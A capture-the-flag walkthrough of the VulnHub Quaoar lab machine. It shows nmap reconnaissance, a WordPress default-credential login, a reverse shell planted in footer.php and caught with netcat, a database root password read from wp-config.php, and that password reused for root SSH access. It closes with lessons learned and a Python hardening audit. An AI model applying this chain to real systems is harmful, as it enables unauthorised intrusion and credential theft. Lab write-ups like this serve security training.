Intro
- Difficulty Level: Very Easy
- Link: VulnHub
Description
The Quaoar vulnerable machine was created for the Hackfest 2016 CTF. It's a Boot2Root type machine (start from the booted VM and work your way up to the superuser "root").
Initial Analysis
The goal is to capture three flags on the machine:
- Get a shell
- Get root access
- Optional: post exploitation flag
Starting up the VM in VirtualBox, the machine displays its IP address on the console.
Step by Step
Step 1: nmap recon
Let’s start with the standard recon nmap scan:
n41lit@n41lit:~$ nmap -sV -O -A 192.168.1.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-29 09:58 EST
Nmap scan report for 192.168.1.101
Host is up (0.0010s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
| 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp open domain ISC BIND 9.8.1-P1
| dns-nsid:
|_ bind.version: 9.8.1-P1
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-title: Site doesn't have a title (text/html).
<SNIP>
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.85 ms 192.168.1.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.66 seconds
The scan shows that port 80 is open. Let's open it in a web browser to see where we can get started.
Step 2: Web Recon and Compromise of the Admin Interface
Opening http://<IP_ADDR>:80 in the web browser shows this page:

It states
Click here to know what you need to know
After a click on that notice, we get directed to the Hack_The_Planet.jpg image:

So let's continue by checking robots.txt for any hints.

Indeed, let's see what's behind /wordpress/:

It's a WordPress site. When we scroll down we can see a Log In field.

Let's try some default credentials.

Bullseye, admin:admin works!
Step 3: Reverse shell
We can leverage a reverse shell script from pentestmonkey [src] to gain access.
The script needs to go into Appearance > Editor > footer.php.
Change the IP in the script to your own machine, load the page again and catch the connection with a netcat listener to get a shell:
n41lit@n41lit:~$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.1.201] from (UNKNOWN) [192.168.1.101] 32835
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
12:15:23 up 4:56, 0 users, load average: 0.34, 0.22, 0.16
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Step 4: Finding the first flag
After we get a shell, let's look around for the first flag:
$ cd home
$ ls
wpadmin
$ cd wpadmin
$ ls
flag.txt
$ cat flag.txt
2bafe61f03117ac66a73c3c514de796e
Reading /home/wpadmin/flag.txt gives us the first flag: 2bafe61f03117ac66a73c3c514de796e
Step 5: Finding the second flag
Let's search for some config files; after all, the web login wasn't protected very well.
$ locate config
<SNIP>
/var/www/upload/config.php
/var/www/upload/modules/tiny_mce_4/tiny_mce/filemanager/config
/var/www/upload/modules/tiny_mce_4/tiny_mce/filemanager/config/.htaccess
/var/www/upload/modules/tiny_mce_4/tiny_mce/filemanager/config/config.php
/var/www/upload/modules/tiny_mce_4/tiny_mce/filemanager/config/config_sik.php
/var/www/upload/modules/tiny_mce_4/tiny_mce/filemanager/config/index.php
/var/www/wordpress/wp-config-sample.php
/var/www/wordpress/wp-config.php
/var/www/wordpress/wp-admin/setup-config.php
/var/www/wordpress/wp-content/plugins/akismet/views/config.php
Let's look into /var/www/wordpress/wp-config.php:
$ cat /var/www/wordpress/wp-config.php
<?php
<SNIP>
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
/** MySQL hostname */
define('DB_HOST', 'localhost');
<SNIP>
Note that the root user is used for the database in the config, together with a plaintext password.
Remember, port 22 is open. Can we perhaps just SSH in as root with that same password?
kali@kali:~$ ssh root@192.168.1.101
<SNIP>
root@192.168.1.101's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Wed Jan 29 12:25:03 EST 2025
System load: 0.17 Processes: 97
Usage of /: 29.9% of 7.21GB Users logged in: 0
Memory usage: 56% IP address for eth0: 192.168.1.101
Swap usage: 0% IP address for virbr0: 192.168.122.1
Graph this data and manage this system at https://landscape.canonical.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com
root@Quaoar:~#
Surely we can!
The second flag is found very easily:
root@Quaoar:~# ls
flag.txt vmware-tools-distrib
root@Quaoar:~# cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb
Step 6: Post exploitation flag
I didn't bother to get the post exploitation flag, since we are already root. But you can try for sure!
Conclusion
Summary
The attack began with an Nmap scan, which revealed multiple open ports, including HTTP (80) and SSH (22). A WordPress site was discovered at /wordpress/, with an easily guessable admin login (admin:admin). Using a PHP reverse shell, an initial foothold was gained. The first flag was found in /home/wpadmin/flag.txt. Further investigation revealed database credentials in wp-config.php, which allowed direct SSH access as root, leading to the second flag.
Lessons learned
- Avoid weak credentials - admin:admin isn't that strong
- Restrict access to sensitive files - wp-config.php should not be readable by every local user
- Protect and monitor open services - logging in over SSH with the root credentials found in the database config was trivial
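As a defensive counterpart to Step 5 and the lessons above, here is an added example (not part of the original write-up) that audits a wp-config.php and an sshd_config for the two weaknesses the chain relied on: a root database user with a short password that is also the system root password, and password-based root SSH login. The sample files and the `mode` permission argument are constructed for the example.

```python
import re
import stat

# Constructed sample in the shape of the wp-config.php found on the box (not the real file).
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_HOST', 'localhost');
"""

# Constructed sshd_config excerpt with the settings that let the root login in Step 5 succeed.
SAMPLE_SSHD_CONFIG = """Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""

DEFINE_RE = re.compile(r"define\(\s*'(\w+)'\s*,\s*'([^']*)'\s*\)")

def parse_wp_defines(text):
    """Return the define('KEY', 'value') pairs of a wp-config.php as a dict."""
    return dict(DEFINE_RE.findall(text))

def audit_wp_config(text, mode=None):
    """Flag DB credential and file-exposure issues; mode is the file's permission bits (assumed input)."""
    d = parse_wp_defines(text)
    findings = []
    if d.get("DB_USER") == "root":
        findings.append("DB_USER is root: use a dedicated MySQL user limited to the WordPress database")
    if len(d.get("DB_PASSWORD", "")) < 16:
        findings.append("DB_PASSWORD is short: use a long random secret, never a system account's password")
    if mode is not None and mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append("wp-config.php is readable by group/others: chmod 600 and chown to the web user")
    return findings

def audit_sshd_config(text):
    """Flag sshd settings that allow password logins as root; an absent option is treated as not hardened."""
    opts = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments and blank lines
        if line:
            key, _, value = line.partition(" ")
            opts[key] = value.strip().lower()
    findings = []
    if opts.get("PermitRootLogin", "yes") != "no":
        findings.append("PermitRootLogin is not 'no': set PermitRootLogin no")
    if opts.get("PasswordAuthentication", "yes") != "no":
        findings.append("PasswordAuthentication is enabled: set PasswordAuthentication no and use keys")
    return findings
```

Running both audits on the constructed samples reproduces every weakness the walkthrough exploited; an empty findings list is the hardened state.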